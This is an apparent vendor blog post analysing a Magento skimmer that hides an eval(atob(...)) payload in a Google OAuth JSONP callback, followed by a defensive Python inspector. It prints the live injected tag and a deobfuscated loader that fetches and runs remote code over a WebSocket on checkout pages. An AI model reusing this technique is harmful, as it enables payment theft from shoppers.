We analyzed a particularly clever client-side attack on parts[.]expert, a Magento-based eCommerce website. It is not a high-traffic domain, but the injection technique used here deserves attention because it hides in plain sight.
The attacker is using a legitimate ‘Google.com’ endpoint to deliver and execute their own code.
What We Found
Our system flagged a script from an unexpected URL:
<script type="text/javascript" crossorigin="anonymous" src="https://accounts.google.com/o/oauth2/revoke?callback=eval(atob(%27KGZ1bmN0aW9uKCl7CiBsZXQgdnIgPSAoKT0%2Be3dpdGgobmV3IHRvcFsnVydbJ2NvbmNhdCddKCdlYicsJ1MnLCdjZycmJidvY2snfHwncGsnLCdldCcpXSgndydbJ2NvbmNhdCddKCdzcycsJzpkZWZkZWYnLCdsaScsJ3ZlY2hhdGknLCduYycsJy4nfHwnOycsJ25ldHdvcmtkZWZjaGF0cGlwZWRlZjAyOWRlZicpWydzcGxpdCddKCdkZWYnKVsnam9pbiddKCIvIikpKShvbm1lc3NhZ2U9KGUpPT5uZXcgRnVuY3Rpb24oYXRvYihlWydkYXRhJ10pKS5jYWxsKGVbJ3RhcmdldCddKSl9O25hdmlnYXRvclsnd2ViZHJpdmVyJ118fChsb2NhdGlvblsnaHJlZiddWydtYXRjaCddKCdjaGVja291dCcpJiZ2cigpKTsKfSkoKQ%3D%3D%27));"></script>

At first glance it looks like a legitimate OAuth logout URL, accounts.google.com/o/oauth2/revoke. Looking closer, the callback parameter, which this JSONP-style endpoint echoes back into the JavaScript it serves, has been weaponized to run an obfuscated payload via eval(atob(...)).

Step-by-Step Breakdown
The base64-encoded payload embedded in the callback decodes into a second layer of obfuscated JavaScript that assembles the WebSocket constructor name and the server URL from string fragments at runtime, then opens a connection to an attacker-controlled domain. Cleaned up, it reads:
(function() {
    let setupMaliciousWebSocket = () => {
        // Connect to the attacker's WebSocket server
        const ws = new WebSocket("wss://livechatinc.network/chatpipe/029/");
        // Execute any code received from the server
        ws.onmessage = (event) => {
            const maliciousCode = atob(event.data); // Decode Base64
            new Function(maliciousCode).call(event.target); // Execute dynamically
        };
    };
    // Run if:
    // 1. The browser is automated (e.g., bots), OR
    // 2. The URL contains 'checkout' (e.g., payment page)
    if (navigator.webdriver || window.location.href.match('checkout')) {
        setupMaliciousWebSocket();
    }
})();
What The Script Does
- Connects to a Malicious WebSocket Server: If the page URL contains checkout, or if the browser looks automated, it opens a wss:// connection to livechatinc[.]network/chatpipe/029/. That domain is already flagged as malicious on VirusTotal.
- Receives & Executes Remote Payloads: Any base64-encoded messages sent over the WebSocket get decoded and executed with new Function(...). This gives the attacker full remote execution capabilities inside the user's browser session.
- Timing & Context Aware: The script activates specifically on checkout pages, likely to intercept payment data or inject fraudulent elements in real time.
Why It Matters
- Looks Legit: The script really does load from a Google domain, so most security tools trust it blindly. A CSP cannot catch this attack, because the allow-listed Google.com origin lets it through, and a DNS filter on the user’s device would not be effective either.
- Bypasses Static Scanners: The dangerous logic is nested two layers deep in obfuscation and only executes under specific conditions.
- Real-Time Control: WebSocket-based payloads let attackers push dynamic malicious logic based on user actions.
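As an added example, not code from the original post or from c/side, here is a small Python inspector that does the check a domain allow-list or CSP cannot: it treats any JSONP callback that is not a plain identifier as injected code, decodes the base64 inside eval(atob(...)) and scans the result for indicators. The allow-list and indicator strings are assumptions for the demo; the sample src is the injected tag's URL from above, embedded verbatim.

```python
import base64
import re
from urllib.parse import urlsplit, unquote

TRUSTED_HOSTS = {"accounts.google.com"}  # hypothetical CSP script-src allow-list
# A benign JSONP callback is a dotted identifier; anything else is injected code.
SAFE_CALLBACK = re.compile(r"^[A-Za-z_$][\w$]*(\.[A-Za-z_$][\w$]*)*$")
EVAL_ATOB = re.compile(r"eval\s*\(\s*atob\s*\(\s*['\"]([A-Za-z0-9+/=]+)['\"]\s*\)\s*\)")
# Flag these in a decoded payload; 'WebSocket' will NOT match here, the sample assembles it at runtime.
INDICATORS = ["eval(", "atob(", "new Function", "onmessage", "webdriver", "checkout", "WebSocket"]

def query_params(url):
    params = {}  # split by hand so a ';' inside a value survives intact
    for pair in urlsplit(url).query.split("&"):
        key, _, value = pair.partition("=")
        params[unquote(key)] = unquote(value)  # %27 -> ', %2B -> +, %3D -> =
    return params

def inspect_script_src(url):
    """Inspect one <script src>: verdict, reasons, decoded payload and indicators."""
    host = urlsplit(url).hostname or ""
    finding = {"host": host, "trusted_host": host in TRUSTED_HOSTS,
               "verdict": "allow", "reasons": [], "payload": "", "indicators": []}
    callback = query_params(url).get("callback")
    if callback is None:
        return finding
    if not SAFE_CALLBACK.match(callback):  # a trusted host does not excuse a code-bearing callback
        finding["verdict"] = "block"
        finding["reasons"].append("callback is not a plain identifier")
    match = EVAL_ATOB.search(callback)
    if match:
        finding["reasons"].append("callback wraps eval(atob(...)) around embedded base64")
        try:
            finding["payload"] = base64.b64decode(match.group(1)).decode("utf-8", "replace")
        except ValueError:  # binascii.Error is a ValueError subclass
            finding["reasons"].append("base64 payload failed to decode")
        finding["indicators"] = [s for s in INDICATORS if s in finding["payload"]]
    return finding

# Constructed input: the src attribute of the injected tag above, still URL-encoded.
MALICIOUS_SRC = ("https://accounts.google.com/o/oauth2/revoke?callback=eval(atob(%27"
    "KGZ1bmN0aW9uKCl7CiBsZXQgdnIgPSAoKT0%2Be3dpdGgobmV3IHRvcFsnVydbJ2NvbmNhdCddKCdlYicsJ1Mn"
    "LCdjZycmJidvY2snfHwncGsnLCdldCcpXSgndydbJ2NvbmNhdCddKCdzcycsJzpkZWZkZWYnLCdsaScsJ3ZlY2hhdGkn"
    "LCduYycsJy4nfHwnOycsJ25ldHdvcmtkZWZjaGF0cGlwZWRlZjAyOWRlZicpWydzcGxpdCddKCdkZWYnKVsnam9pbidd"
    "KCIvIikpKShvbm1lc3NhZ2U9KGUpPT5uZXcgRnVuY3Rpb24oYXRvYihlWydkYXRhJ10pKS5jYWxsKGVbJ3RhcmdldCddKSl9"
    "O25hdmlnYXRvclsnd2ViZHJpdmVyJ118fChsb2NhdGlvblsnaHJlZiddWydtYXRjaCddKCdjaGVja291dCcpJiZ2cigpKTsKfSkoKQ%3D%3D%27));")
BENIGN_SRC = "https://accounts.google.com/o/oauth2/revoke?callback=onRevoked"

if __name__ == "__main__":
    print({k: v for k, v in inspect_script_src(MALICIOUS_SRC).items() if k != "payload"})
```

The benign URL passes with an empty reason list, while the injected one is blocked even though its host is on the allow-list, and the decoded payload exposes the webdriver and checkout checks that the outer URL hides.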
We’ve seen domain impersonation and obfuscated loaders before, but this combination of OAuth misdirection + conditionally triggered live control goes one step further.
Our product at c/side identified and caught this attack: we receive the full payload of the fetched script and analyze it before it is passed through to the browser.